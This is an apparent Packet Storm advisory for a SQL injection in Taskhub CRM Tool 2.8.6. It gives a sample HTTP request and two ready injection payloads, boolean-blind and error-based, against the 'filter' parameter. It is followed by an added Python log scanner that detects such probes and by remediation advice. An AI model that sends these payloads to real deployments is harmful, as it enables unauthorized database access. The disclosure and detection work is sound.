Taskhub CRM Tool 2.8.6 SQL Injection

Taskhub CRM Tool version 2.8.6 suffers from a remote SQL injection vulnerability.

Packet Storm
# Exploit Title: Taskhub CRM Tool 2.8.6 - SQL Injection
# Date: 2023-08-12
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor: https://codecanyon.net/item/taskhub-project-management-finance-crm-tool/25685874
# Tested on: Kali Linux & MacOS
# CVE: N/A

### Request ###

GET /projects?filter=notstarted HTTP/1.1
Host: localhost
Cookie: csrf_cookie_name=a3e6a7d379a3e5f160d72c182ff8a8c8; ci_session=tgu03eoatvsonh7v986g1vj57b8sufh9
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/116.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

### Parameter & Payloads ###

Parameter: filter (GET)

Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: filter=notstarted' AND 2978=2978 AND 'vMQO'='vMQO

Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: filter=notstarted' AND EXTRACTVALUE(5313,CONCAT(0x5c,0x716a707a71,(SELECT(ELT(5313=5313,1))),0x71787a6b71)) AND 'ronQ'='ronQ
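
For defenders reviewing web server logs, the following added example (not part of the original advisory or the vendor's code) flags requests to /projects whose decoded `filter` value is not a plain token. The token pattern, the combined log format, the un-prefixed /projects path and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: legitimate filter values are short lowercase tokens such as the
# "notstarted" value in the advisory's request; the full value set is not on the page.
SAFE_FILTER = re.compile(r"[a-z_]{1,32}")
# Request field of a combined-format access log: "METHOD target HTTP/x.y"
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_filter(target):
    """Return the decoded filter value when a /projects request carries a
    value outside the expected token shape, otherwise None."""
    parts = urlsplit(target)
    if parts.path.rstrip("/") != "/projects":
        return None
    # parse_qs percent-decodes, so encoded quotes and spaces are seen in clear.
    for value in parse_qs(parts.query, keep_blank_values=True).get("filter", []):
        if not SAFE_FILTER.fullmatch(value):
            return value
    return None

def scan(lines):
    """Return (client_ip, decoded_value) for every flagged log line."""
    hits = []
    for line in lines:
        match = REQUEST.search(line)
        if not match:
            continue
        value = suspicious_filter(match.group(1))
        if value is not None:
            hits.append((line.split(" ", 1)[0], value))
    return hits

# Constructed sample log lines (documentation IP addresses, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Aug/2023:10:01:02 +0000] "GET /projects?filter=notstarted HTTP/1.1" 200 5120',
    '203.0.113.9 - - [12/Aug/2023:10:01:05 +0000] "GET /projects?filter=notstarted%27%20AND%202978%3D2978%20AND%20%27vMQO%27%3D%27vMQO HTTP/1.1" 200 5120',
    '203.0.113.9 - - [12/Aug/2023:10:01:06 +0000] "GET /tasks?filter=notstarted%27 HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for ip, value in scan(SAMPLE_LOG):
        print(f"{ip} sent unexpected filter value: {value!r}")
```

The same allowlist check applied server-side before the value reaches the query, together with parameterized queries, removes the injection point rather than only detecting probes against it.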
